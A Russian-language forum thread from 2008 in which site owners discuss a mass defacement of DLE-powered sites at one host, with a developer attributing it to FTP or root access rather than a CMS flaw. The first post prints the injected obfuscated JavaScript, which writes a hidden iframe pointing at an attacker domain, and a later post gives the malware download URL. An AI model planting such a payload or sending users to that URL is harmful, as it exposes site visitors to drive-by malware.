IMPERATOR 1 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 Сегодня в 9, 9:30 по Москве,произошёл массовый взлом сайтов на движке ДЛЕ! Был Прописан вредный скрипт в массу файлов движка из-за чего не рабочими оказались куча сайтов,такие как www.vip-zona.com , http://xlifes.ru/index.php и много других,кстати http://xlifes.ru до сих пор находится в повреждённом состоянии! Можете вглянуть! Короче произошла массовая иньекция по РНР! У меня тоже была та же херь.больше часа правил,пожалуйста,разработчики усильте безопасность скрипта,а то если так то опять взламывать будут! вот чё вшивали СЦУКИ <html><body> <script>var source ="=jgsbnf!tsd>(iuuq;00qsfwfewtfn234/do0360joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = ""; for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1); document.write(result); </script> </body></html> Цитата Ссылка на сообщение Поделиться на других сайтах
kosen 3 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 С чего такая информация? Это касается ТОЛЬКО ТВОИХ сайтов? Или ВООБЩЕ? Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 Автор Причем здесь мои? Мой и ещё кучу,все что написал это не мои и ко мне не относятся,мой http://www.imperia-of-hentai.ru я уже поправил Цитата Ссылка на сообщение Поделиться на других сайтах
kosen 3 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 Хм. У себя я таких проблем не вижу... Цитата Ссылка на сообщение Поделиться на других сайтах
empirator 0 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 У себя я таких проблем не вижу... Аналогично! Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 Автор По ходу это произошло у всех кто имеет движки Дле и хостится у machoster.ru хостеры сказали это атака конкурентов,т.к. их сайт также подвергся такой же иньекцией! Цитата Ссылка на сообщение Поделиться на других сайтах
n0wheremany 0 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 какие версии стояли на сайтах? Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 066 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 У меня тоже была та же херь.больше часа правил,пожалуйста,разработчики усильте безопасность скрипта,а то если так то опять взламывать будут! Не могу, т.к. неиспользовались уязвимости скрипта, файлы менялись не через скрипт, а по FTP или через root доступ, а дальше троян ищет все файлы по слову <body> и заменяет его на вредоносный JS. Какой движок при этом не важно. Видимо воспользовались какой то дыркой в серверном ПО. Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 Автор на моём и на вип зоне 7,2 .сегодня поменял на 7,3 но взламывали 7,2 Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 066 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 на моём и на вип зоне 7,2 .сегодня поменял на 7,3 но взламывали 7,2 эти версии не имеют изменений в безопасности, т.к. проблемы в безопасности в скрипте невыявлялись Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 Автор У меня тоже была та же херь.больше часа правил,пожалуйста,разработчики усильте безопасность скрипта,а то если так то опять взламывать будут! Не могу, т.к. неиспользовались уязвимости скрипта, файлы менялись не через скрипт, а по FTP или через root доступ, а дальше троян ищет все файлы по слову <body> и заменяет его на вредоносный JS. Какой движок при этом не важно. Видимо воспользовались какой то дыркой в серверном ПО. Странно,у меня три сайта у этого хостера 2 на ДЛЕ,третий нет,взломали только те что на ДЛЕ И менялись только файлы в папке engine/ причём имеющие права 644 и главный шаблон Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 066 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 Странно,у меня три сайта у этого хостера 2 на ДЛЕ,третий нет,взломали только те что на ДЛЕ Понимаете в таких случаях не сидит человек и не ищет вручную где что изменить, просто запускается бот, в котором заложено что искать, на что менять и т.д. Возможно в нем заложены списки файлов которые есть в DLE и других популярных движков, возможно только DLE, я этого незнаю, не я же создавал эти боты.И менялись только файлы в папке engine/ причём имеющие права 644 и главный шаблон Что лишний раз подтверждает что меняли не с web, а с правами выше, через веб нельзя изменить файл на который нет прав на запись, и права изменить нельзя, их может менять только только от имени владелеца файла. Поэтому при установке скриптов вы ставите определенные права на запись, чтобы скрипты могли работать, а не потому что програмистам лень написать код, который сам будет изменять права. Безопасность скрипта заключается в том, чтобы через него не произошел взлом, но если меняются файлы через FTP или ROOT, то тут он бессилен, т.к. он не участвует в этом процессе Цитата Ссылка на сообщение Поделиться на других сайтах
IMPERATOR 1 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 Автор И так, вычислил,козлы перенаправляют на сайт http://prevedvsem123.cn/25/getfile.php?f=vispdf написано по русски но домен китайский Цитата Ссылка на сообщение Поделиться на других сайтах
alxumuk 0 Опубликовано: 18 октября 2008 Рассказать Опубликовано: 18 октября 2008 И так, вычислил,козлы перенаправляют на сайт http://prevedvsem123.cn/25/getfile.php?f=vispdf написано по русски но домен китайский да .cn может любой желающий купить причём цена на него мизерная... Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.